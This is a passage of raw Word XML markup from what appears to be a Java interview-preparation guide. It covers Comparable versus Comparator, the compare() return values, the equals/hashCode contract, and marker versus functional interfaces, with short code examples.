            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B361D5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xt</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7610D1D2"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objects are compared within their own class (implements Comparable)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E4E541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a custom comparison logic is required (typically in sorting or collections)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E68C7" w:rsidRPr="00CE4B95" w14:paraId="455CF7EE" w14:textId="77777777" w:rsidTr="00EE15F1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="21852C1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Being Compared</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0CFA41C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he current object (this) with the given object (o)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77BA690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separate objects (o1, o2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004E68C7" w:rsidRPr="00CE4B95" w14:paraId="53CDF7A0" w14:textId="77777777" w:rsidTr="00EE15F1">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1AA047F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11F6AFA5"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the class implements Comparable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3FBD14A6"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we want a custom sorting order without changing the class itself</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1FA18E5E"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13DF6C71"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To()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A method from the Comparable interface used to define the natural ordering of objects within a class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4FD8AE"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A method from the Comparator interface used to define custom comparison logic, allowing comparisons between objects of any class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B387CC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0" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2637C177" w14:textId="189AAEC7" w:rsidR="001D1EE4" w:rsidRPr="00CE4B95" w:rsidRDefault="005D2449">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="63" w:name="_Toc197867277"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the return type of compare method</w:t>
      </w:r>
      <w:r w:rsidR="001D1EE4" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="63"/>
    </w:p>
    <w:p w14:paraId="07531E75" w14:textId="0D593EE9" w:rsidR="006453AF" w:rsidRPr="00CE4B95" w:rsidRDefault="006453AF" w:rsidP="00C81DC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turn type of the compare() method in the Comparator interface is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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC41F5C"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F3D061" w14:textId="77777777" w:rsidR="006453AF" w:rsidRPr="00CE4B95" w:rsidRDefault="006453AF" w:rsidP="00C81DCA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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 compare(T o1, T o2)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: This method compares two objects, o1 and o2, and returns an integer value that indicates the order of the two objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548E0FC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ossible return values are:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6900068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gative integer</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If o1 is less than o2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41085771"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ero</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If o1 is equal to o2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780F6C6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itive integer</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If o1 is greater than o2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BFA4C3"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D20766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16C062C" w14:textId="77777777" w:rsidR="006453AF" w:rsidRPr="00CE4B95" w:rsidRDefault="006453AF" w:rsidP="00C81DCA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="183596E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5AEAC6BD"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BD7264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07E52DD8" w14:textId="77777777" w:rsidR="006453AF" w:rsidRPr="00CE4B95" w:rsidRDefault="006453AF" w:rsidP="00C81DCA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E1C713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24310CB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8C1EDD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2CE731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227B0C" w14:textId="77777777" w:rsidR="006453AF" w:rsidRPr="00CE4B95" w:rsidRDefault="006453AF" w:rsidP="00C81DCA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66D743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B48D5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436E49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ED1E1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A86E5D" w14:textId="77777777" w:rsidR="006453AF" w:rsidRPr="00CE4B95" w:rsidRDefault="006453AF" w:rsidP="00C81DCA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="779EB1F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geComparator implements Comparator&lt;Student&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1F065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742D96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4A9AF4D2"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teger.compare(s1.getAge(), s2.getAge()); // Returns the difference of ages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35AF032B"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194B2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6522C2" w14:textId="77777777" w:rsidR="006453AF" w:rsidRPr="00CE4B95" w:rsidRDefault="006453AF" w:rsidP="00C81DCA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39F3558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724E8D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05874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1 = new Student("Alice", 20);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65237C5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2 = new Student("Bob", 25);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D6615CF" w14:textId="77777777" w:rsidR="006453AF" w:rsidRPr="00CE4B95" w:rsidRDefault="006453AF" w:rsidP="00C81DCA">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="705F77D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geComparator ageComparator = new AgeComparator();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19867F6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Comparator.compare(s1, s2)); // Output will be a negative integer (-5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D260B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D54591"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DA938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485AA9AA" w14:textId="77777777" w:rsidR="006453AF" w:rsidRPr="00CE4B95" w:rsidRDefault="006453AF" w:rsidP="00C81DCA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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1, s2) returns a negative integer because s1 (Alice) is younger than s2 (Bob).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76068856" w14:textId="4348EA2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1" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB7C89E" w14:textId="5C9DD6FD" w:rsidR="001D1EE4" w:rsidRPr="00CE4B95" w:rsidRDefault="0033685F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="64" w:name="_Toc197867278"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is contract in equals and hashcode method</w:t>
      </w:r>
      <w:r w:rsidR="001D1EE4" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="64"/>
    </w:p>
    <w:p w14:paraId="4D7283B7" w14:textId="0737B8D3" w:rsidR="002B6093" w:rsidRPr="00CE4B95" w:rsidRDefault="002B6093" w:rsidP="009B5CA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e equals() and hashCode() Contract:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C030A57"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 between equals() and hashCode():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB06A2B"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considered equal according to the equals() method, they must have the same hash code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E5E729"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ans that if a.equals(b) returns true, then a.hashCode() must be equal to b.hashCode().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E1ED55"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ever, two objects having the same hash code does not necessarily mean they are equal according to equals().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5A9CC2"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objects can have the same hash code (hash collisions), but they may not be considered equal by the equals() method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183CB83D"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Contract:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C74B614"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xive</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: An object must be equal to itself.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547A06C4"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a) must return true.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68625D73"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mmetric</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If a.equals(b) returns true, then b.equals(a) must also return true.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A7F33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itive</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If a.equals(b) returns true and b.equals(c) returns true, then a.equals(c) must also return true.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662AA181"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Repeated calls to a.equals(b) should consistently return the same result, as long as the objects are not modified.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C82BCD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comparison</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: a.equals(null) should always return false.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E942C73"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Contract:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6579FA2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For any object, the hashCode() method must return the same integer value during the lifetime of the object, provided no fields used in equals() are modified.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137EF48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equal (i.e., a.equals(b) is true), they must have the same hash code</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08789028"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not equal (i.e., a.equals(b) is false), it is not required for their hash codes to be different</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, but it's highly recommended to minimize hash collisions to improve the performance of hash-based collections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F53090" w14:textId="77777777" w:rsidR="00B45C47" w:rsidRPr="00CE4B95" w:rsidRDefault="00B45C47" w:rsidP="009B5CA7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="143EF439" w14:textId="1E693A7B"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E2BF03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06AA7E91" w14:textId="77777777" w:rsidR="002B6093" w:rsidRPr="00CE4B95" w:rsidRDefault="002B6093" w:rsidP="009B5CA7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55C6305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F38F47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706321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3BBBE06" w14:textId="77777777" w:rsidR="002B6093" w:rsidRPr="00CE4B95" w:rsidRDefault="002B6093" w:rsidP="009B5CA7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5475ABB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41498CE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DAE882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BAB0A8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BFB144" w14:textId="77777777" w:rsidR="002B6093" w:rsidRPr="00CE4B95" w:rsidRDefault="002B6093" w:rsidP="009B5CA7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2400377A"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equals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375CF88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4B6DED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68E728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1CCA23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27938C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6F85229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Objects.equals(name, person.name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618C8F9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E39A6" w14:textId="77777777" w:rsidR="002B6093" w:rsidRPr="00CE4B95" w:rsidRDefault="002B6093" w:rsidP="009B5CA7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67A6774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hashCode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783C020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126380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23F75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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778E61D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4D56D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09642D" w14:textId="77777777" w:rsidR="002B6093" w:rsidRPr="00CE4B95" w:rsidRDefault="002B6093" w:rsidP="009B5CA7">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3954E5AB"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8FBAA5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C3721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25);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FC16E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25);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770740C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4D20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true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E7CB91"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hashCode() == p2.hashCode());  // true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="087978F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22FFF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C264D8"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reakdown of the Contract:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A3A290"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ity (equals())</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A03DF6"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equals(p2) returns true because both p1 and p2 have the same name and age.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E75E36D"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de Consistency</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA2BD5E"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p1.equals(p2) is true, p1.hashCode() must be the same as p2.hashCode(), which is checked by the expression p1.hashCode() == p2.hashCode().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4780DB"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is contract important?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B275D3A" w14:textId="77777777" w:rsidR="002B6093" w:rsidRPr="00CE4B95" w:rsidRDefault="002B6093" w:rsidP="009B5CA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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based collections (like HashMap, HashSet)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> rely on both equals() and hashCode() to efficiently locate objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703043B9" w14:textId="77777777" w:rsidR="002B6093" w:rsidRPr="00CE4B95" w:rsidRDefault="002B6093" w:rsidP="009B5CA7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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CE4B95" w:rsidRDefault="002B6093" w:rsidP="009B5CA7">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us, ensuring a correct implementation of both equals() and hashCode() is critical for using objects in hash-based collections.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53549B01" w14:textId="7F8552E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2" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="662DEAC5" w14:textId="3DC83820" w:rsidR="001D1EE4" w:rsidRPr="00CE4B95" w:rsidRDefault="004B64D0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="65" w:name="_Toc197867279"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidR="0012150D" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>ifference between Marker interface and Functional interface</w:t>
      </w:r>
      <w:r w:rsidR="001D1EE4" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="65"/>
    </w:p>
    <w:p w14:paraId="65C75573" w14:textId="56708368" w:rsidR="008A20F6" w:rsidRPr="00CE4B95" w:rsidRDefault="008A20F6" w:rsidP="009A5F7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Marker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is an interface that does not contain any methods. It is used to mark or signal that a class possesses some special property or behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B26000F"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BF7BF5E"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izable</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> interface is a typical marker interface. It marks the class as serializable, and the JVM knows that such a class can be converted to a byte stream.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A753F8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erializable {}  // Marker Interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F122735" w14:textId="77777777" w:rsidR="008A20F6" w:rsidRPr="00CE4B95" w:rsidRDefault="008A20F6" w:rsidP="009A5F77">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0676F2F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erializable {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C530DD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name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39461E4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5205A18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138ACB"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erializable interface does not contain any methods. The Person class implements it to indicate that instances of Person can be serialized.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C06F27"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3E750A1A"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no methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B11669B"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classes for specific behaviors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559A1602"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havior is typically handled by other components in the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134B326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functional interface is to represent a single operation or action that can be passed around as a lambda expression or method reference.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E4D57F"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CDF2FF2"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unnable interface is an example of a functional interface, which has a single abstract method run().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593F2357"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663BA4E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193346FC"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5F36E31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22C36" w14:textId="77777777" w:rsidR="008A20F6" w:rsidRPr="00CE4B95" w:rsidRDefault="008A20F6" w:rsidP="009A5F77">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69570B6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ask implements Runnable {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5E3F7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79B4D300"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is running");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290F97FE"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46C1D1"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640E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Runnable is a functional interface with a single abstract method run(). It can be implemented using a lambda expression like this:</w:t>
